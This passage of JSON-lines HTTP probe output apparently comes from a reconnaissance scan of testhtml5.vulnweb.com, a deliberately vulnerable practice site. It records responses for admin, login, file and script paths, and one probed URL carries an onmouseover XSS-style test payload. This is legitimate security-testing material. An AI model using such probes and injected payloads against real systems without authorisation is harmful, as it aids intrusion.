e\":200,\"content_length\":1884,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.62332073Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/controllers/controllers.js\",\"input\":\"http://testhtml5.vulnweb.com/static/app/controllers/controllers.js\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/controllers/controllers.js\",\"time\":\"352.425082ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":593,\"lines\":95,\"status_code\":200,\"content_length\":2582,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:04.666469309Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js\",\"input\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/libs/sessvars.js\",\"time\":\"354.763766ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":3303,\"lines\":207,\"status_code\":200,\"content_length\":8869,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:05.432529428Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/\",\"input\":\"http://testhtml5.vulnweb.com:80/\",\"title\":\"SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"350.189648ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":1483,\"lines\":164,\"status_code\":200,\"content_length\":6940,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:05.448526935Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/ \",\"input\":\"http://testhtml5.vulnweb.com:80/%20\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%20\",\"time\":\"352.874398ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:05.459700184Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/\\u0026AlexaHash=0989==\",\"input\":\"http://testhtml5.vulnweb.com:80/\\u0026AlexaHash=0989==\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\\u0026AlexaHash=0989==\",\"time\":\"339.669923ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:05.47399998Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/\\u003cb onmouseover=alert('Wufff!')\\u003eclick me!\\u003c/b\\u003e\",\"input\":\"http://testhtml5.vulnweb.com:80/%3Cb%20onmouseover=alert('Wufff!')%3Eclick%20me!%3C/b%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/%3Cb%20onmouseover=alert%28%27Wufff%21%27%29%3Eclick%20me%21%3C/b%3E\",\"time\":\"347.02041ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:05.498663843Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/123\",\"input\":\"http://testhtml5.vulnweb.com:80/123\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/123\",\"time\":\"346.942302ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:05.510955449Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/,\",\"input\":\"http://testhtml5.vulnweb.com:80/,\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/,\",\"time\":\"348.963466ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:05.512020782Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/Signup.aspx\",\"input\":\"http://testhtml5.vulnweb.com:80/Signup.aspx\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Signup.aspx\",\"time\":\"351.279771ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:05.526855174Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/about\",\"input\":\"http://testhtml5.vulnweb.com:80/about\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/about\",\"time\":\"356.893814ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:05.549862235Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/admin\",\"input\":\"http://testhtml5.vulnweb.com:80/admin\",\"location\":\"http://localhost/admin/\",\"title\":\"Redirecting...\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin\",\"time\":\"360.856655ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":22,\"lines\":4,\"status_code\":308,\"content_length\":253,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:05.5653749Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"input\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"title\":\"403 Forbidden\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/partials/\",\"time\":\"354.366659ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":69,\"lines\":14,\"status_code\":403,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:05.572991936Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials/{{item.value.url}}\",\"input\":\"http://testhtml5.vulnweb.com/static/app/partials/%7B%7Bitem.value.url%7D%7D\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/partials/%7B%7Bitem.value.url%7D%7D\",\"time\":\"348.55704ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:05.674650652Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/admin/\",\"input\":\"http://testhtml5.vulnweb.com:80/admin/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/\",\"time\":\"352.322702ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Basic\",\"Nginx:1.19.0\"],\"words\":15,\"lines\":2,\"status_code\":401,\"content_length\":90,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:05.72282886Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/adminstrator\",\"input\":\"http://testhtml5.vulnweb.com:80/adminstrator\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/adminstrator\",\"time\":\"344.984466ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:06.489174848Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/ajax/archive\",\"input\":\"http://testhtml5.vulnweb.com:80/ajax/archive\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/archive\",\"time\":\"350.045832ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:06.490196636Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/ajax/latest\",\"input\":\"http://testhtml5.vulnweb.com:80/ajax/latest?\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/latest\",\"time\":\"356.735193ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:06.503592949Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/ajax/latest?offset\",\"input\":\"http://testhtml5.vulnweb.com:80/ajax/latest?offset=\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/latest?offset\",\"time\":\"342.562286ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:06.527770348Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/ajax/like?id\",\"input\":\"http://testhtml5.vulnweb.com:80/ajax/like?id=\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/like?id\",\"time\":\"352.576947ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:06.549773572Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/ajax/popular?offset\",\"input\":\"http://testhtml5.vulnweb.com:80/ajax/popular?offset=\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/popular?offset\",\"time\":\"354.444475ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":2,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:06.559415425Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/archive\",\"input\":\"http://testhtml5.vulnweb.com:80/archive\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/archive\",\"time\":\"348.444571ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:06.570721412Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/all/filter/:filter\",\"input\":\"http://testhtml5.vulnweb.com:80/all/filter/:filter\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/all/filter/:filter\",\"time\":\"351.320488ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:06.571612646Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/carousel\",\"input\":\"http://testhtml5.vulnweb.com:80/carousel\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/carousel\",\"time\":\"348.227839ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:06.604636499Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/comment\",\"input\":\"http://testhtml5.vulnweb.com:80/comment\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/comment\",\"time\":\"343.023527ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":899,\"lines\":101,\"status_code\":200,\"content_length\":4472,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:06.631369314Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/contact\",\"input\":\"http://testhtml5.vulnweb.com:80/contact\",\"title\":\"405 Method Not Allowed\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/contact\",\"time\":\"365.649256ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":20,\"lines\":5,\"status_code\":405,\"content_length\":178,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:06.632916156Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/forgotpw\",\"input\":\"http://testhtml5.vulnweb.com:80/forgotpw\",\"title\":\"405 Method Not Allowed\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/forgotpw\",\"time\":\"342.408503ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":20,\"lines\":5,\"status_code\":405,\"content_length\":178,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:06.724840799Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/getfile?fname=sample1.py\",\"input\":\"http://testhtml5.vulnweb.com:80/getfile?fname=sample1.py\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/getfile?fname=sample1.py\",\"time\":\"353.209915ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:06.766640966Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/latest\",\"input\":\"http://testhtml5.vulnweb.com:80/latest\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/latest\",\"time\":\"339.697805ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.524865745Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/latest/page/:page\",\"input\":\"http://testhtml5.vulnweb.com:80/latest/page/:page\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/latest/page/:page\",\"time\":\"340.501412ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.551429962Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/login\",\"input\":\"http://testhtml5.vulnweb.com:80/login\",\"title\":\"405 Method Not Allowed\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/login\",\"time\":\"354.953294ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":20,\"lines\":5,\"status_code\":405,\"content_length\":178,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.550738373Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/like\",\"input\":\"http://testhtml5.vulnweb.com:80/like\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/like\",\"time\":\"364.512089ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":901,\"lines\":102,\"status_code\":200,\"content_length\":4501,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.564446972Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/logout\",\"input\":\"http://testhtml5.vulnweb.com:80/logout\",\"location\":\"http://testhtml5.vulnweb.com/\",\"title\":\"Redirecting...\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/logout\",\"time\":\"347.717589ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":22,\"lines\":4,\"status_code\":302,\"content_length\":265,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.580989872Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/popular\",\"input\":\"http://testhtml5.vulnweb.com:80/popular\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/popular\",\"time\":\"344.252855ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.606004295Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/redir\",\"input\":\"http://testhtml5.vulnweb.com:80/redir\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir\",\"time\":\"351.834873ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.608522875Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/popular/page/:page\",\"input\":\"http://testhtml5.vulnweb.com:80/popular/page/:page\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/popular/page/:page\",\"time\":\"351.871363ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.613459299Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/report\",\"input\":\"http://testhtml5.vulnweb.com:80/report\",\"title\":\"SecurityTweets\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/report\",\"time\":\"346.222484ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"AngularJS\",\"Nginx:1.19.0\"],\"words\":898,\"lines\":101,\"status_code\":200,\"content_length\":4462,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.64518535Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/robot.txt\",\"input\":\"http://testhtml5.vulnweb.com:80/robot.txt\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/robot.txt\",\"time\":\"342.81341ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.661461032Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/robots\",\"input\":\"http://testhtml5.vulnweb.com:80/robots\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/robots\",\"time\":\"339.365564ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":31,\"lines\":5,\"status_code\":404,\"content_length\":232,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.708245419Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/samples/\",\"input\":\"http://testhtml5.vulnweb.com:80/samples/\",\"title\":\"Python samples\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/samples/\",\"time\":\"358.650164ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":54,\"lines\":14,\"status_code\":200,\"content_length\":386,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.771486905Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/static/app/app.js\",\"input\":\"http://testhtml5.vulnweb.com:80/static/app/app.js\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/app.js\",\"time\":\"347.245002ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":548,\"lines\":63,\"status_code\":200,\"content_length\":1884,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.817572586Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/static/app/controllers/controllers.js\",\"input\":\"http://testhtml5.vulnweb.com:80/static/app/controllers/controllers.js\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/controllers/controllers.js\",\"time\":\"351.514726ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":593,\"lines\":95,\"status_code\":200,\"content_length\":2582,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:07.981530931Z\",\"url\":\"http://testhtml5.vulnweb.comtext/xml\",\"input\":\"http://testhtml5.vulnweb.comtext/xml\",\"error\":\"no address found for host\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:20:08.594635215Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/static/app/libs/sessvars.js\",\"input\":\"http://testhtml5.vulnweb.com:80/static/app/libs/sessvars.js\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/static/app/libs/sessvars.js\",\"time\":\"346.908502ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":3303,\"lines\":207,\"status_code\":200,\"content_length\":8869,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:08.602416174Z\",\"port\":\"80\",\"url\":\"http://testhtml5.vulnweb.com:80/static/app/libs/sessvars.js:105at\",\"input\":\"http://testhtml5.vulnweb.com:80/static/app/libs/sessvars.js:105at\",\"title\":\"404 Not 